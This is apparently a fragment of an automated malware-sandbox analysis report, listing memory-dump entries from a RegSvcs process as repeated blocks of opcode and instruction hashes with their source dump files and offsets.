                                                              • Instruction ID: 35cc282feaf9833042813f5273e7c57580f1cf015e68e0547c2360c603ba6178
                                                              • Opcode Fuzzy Hash: 0f4d34249ded447cc0d10dca816720ba74e97815dab4263428879e7c26cb3083
                                                              • Instruction Fuzzy Hash: 1241F5B4E012488FDB18DFAAD9506ADFBF2AF89300F20D569D418BB254DB345A46CF40
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf28f5be0f9c834db5422c06273eecf26c4b98f1e02d48e66c51371636f9e24f
                                                              • Instruction ID: ecc9e29a482ad1db8093648312bf664a22c84944e58ab70395c68fd2e42e7831
                                                              • Opcode Fuzzy Hash: cf28f5be0f9c834db5422c06273eecf26c4b98f1e02d48e66c51371636f9e24f
                                                              • Instruction Fuzzy Hash: 714115B1E01248CBDB18DFEAD9406DEBBF2AF88300F24D46AC519BB255DB345946CF40
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbf2f9d0d4196cd7f160e47d337af0de8ed44e638d858c0c0420a5c70588d16c
                                                              • Instruction ID: b0820e8cb5901281fdd5bba272cc61227489d94cb73f520f504f2aa98cf7e0fd
                                                              • Opcode Fuzzy Hash: dbf2f9d0d4196cd7f160e47d337af0de8ed44e638d858c0c0420a5c70588d16c
                                                              • Instruction Fuzzy Hash: 8841F374E056488FEB18CFAAD9406EDFBF2AF89300F24D16AC518BB255DB345946CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb0f9aecd2f71ddb5a0ae3e5763b20b655a042b08097cb833aede11d180d8b8c
                                                              • Instruction ID: 8c4f4f710f9b8146b47da622fa8ee7266e98e49328160e57b7b1bf27ff0518e2
                                                              • Opcode Fuzzy Hash: bb0f9aecd2f71ddb5a0ae3e5763b20b655a042b08097cb833aede11d180d8b8c
                                                              • Instruction Fuzzy Hash: 024114B4E01208CBDB18DFAAD9446AEFBF2AF88300F24D169C519BB265DB345946CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f6159a9485e0a84b7a9b28e58d92c041a5aea4ebb2de9b13000b69803fac0b0
                                                              • Instruction ID: 3017f9aadb9586208545b98f1f5862265149657bb108251d306b3861ac89ce55
                                                              • Opcode Fuzzy Hash: 8f6159a9485e0a84b7a9b28e58d92c041a5aea4ebb2de9b13000b69803fac0b0
                                                              • Instruction Fuzzy Hash: 984107B0E0124CCBDB18DFAAD9546AEFBF2AF88300F24C16AC415BB265DB345946CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9bee7ff7e477c94b88bc05b70da792ff489b3dd53677bd88ab196174e3a1771a
                                                              • Instruction ID: eaa6d715a0611bba5c4c9e683128dd3aab91763e259017514859381ad69c9ed6
                                                              • Opcode Fuzzy Hash: 9bee7ff7e477c94b88bc05b70da792ff489b3dd53677bd88ab196174e3a1771a
                                                              • Instruction Fuzzy Hash: A441F574E01248CBDB18CFAAD9446EEFBF2AF88300F24D56AC418BB255EB345946CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46fb4716a934edd2ff529eee7f6fb70284a8d599727fcc02bc7c7e385de8f855
                                                              • Instruction ID: ea946a4df0186848730a5caf1f3871abb66a6775adbfecebc9b343d502727f6f
                                                              • Opcode Fuzzy Hash: 46fb4716a934edd2ff529eee7f6fb70284a8d599727fcc02bc7c7e385de8f855
                                                              • Instruction Fuzzy Hash: A741E274E00248CBDB18DFAAD9446AEFBF2AF89300F24C16AD519BB264DB345946CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 79f55b57941045d2346c4ef0808f96d4ed393c7fd21cf7657f8978737e6ae523
                                                              • Instruction ID: e4eeb4906aabe7246bd8466eb5f14bcb9eaa8d3c219c27a1735aed52fa9c1c9e
                                                              • Opcode Fuzzy Hash: 79f55b57941045d2346c4ef0808f96d4ed393c7fd21cf7657f8978737e6ae523
                                                              • Instruction Fuzzy Hash: 3F41F774D01649CBDB18CFBAD95069EFBF2AF88300F24D16AC418BB259DB345946CF40
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18c489d6318911614238ffcdf665b1088de73f0618a9156a9f06010c45eb4a34
                                                              • Instruction ID: 81f6a84efd0a30f197e1972cb54b7b68f02141f761081673f5e34a4ae410f3a4
                                                              • Opcode Fuzzy Hash: 18c489d6318911614238ffcdf665b1088de73f0618a9156a9f06010c45eb4a34
                                                              • Instruction Fuzzy Hash: 8631F570E00248CBDB18DFAAD9446AEFBF2BF88300F20D169C419BB265DB345946CF54
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dffe09b8b3335679bb3a04a429b533caa798402a70d7bc66bf9e624229089f42
                                                              • Instruction ID: e71def88173d7a67fb5b13f76ad37a9e351ff78f54a466c699a3272b36cb43d2
                                                              • Opcode Fuzzy Hash: dffe09b8b3335679bb3a04a429b533caa798402a70d7bc66bf9e624229089f42
                                                              • Instruction Fuzzy Hash: CED06775D8411D8ACB11EF58DC402FCB772EBAA300F0020A9914CA7254D7709A948A19